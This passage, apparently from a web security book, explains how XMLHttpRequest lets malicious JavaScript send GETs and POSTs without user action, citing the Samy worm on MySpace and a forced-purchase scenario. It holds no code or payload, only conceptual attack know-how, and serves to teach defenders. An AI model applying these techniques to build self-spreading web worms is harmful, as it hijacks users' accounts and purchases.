com; or simply common mail applications such as Yahoo!,
Google, or Hotmail are all attacks where an XHR GETs or POSTs could affect thousands
of users within one domain. For example, the Samy worm was able to perform XMLHTTP
POSTs on MySpace by calling the URL with the www prefix (www.myspace.com + [name
of myspace user]).
Some of you might be saying that any JavaScript could perform similar exploits, so
what is the big deal about XHR? The fact that XHR can automatically (and easily) perform
GETs and POSTs without the user??™s participation is key. For example, using XHR to
POST is far simpler because the attacker can simply send the data. With JavaScript, the
attacker would have to build a form with all the correct values in an iFrame and then
submit that form. For an attack to be a full-blown virus or worm, it must be able to prorogate
by itself, with limited or no user interaction. For example, XHR can allow many
HTTP GETs or POSTs automatically, forcing a user to perform many functions asynchronously.
Or a malicious XHR function could force a user to purchase an item by viewing
a simple web forum posting about the product. While the web application require multiple
verification steps, including add-to-card, buy, confirm, and then purchase, XHR can
automate the POSTs behind the scenes.
Pages:
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212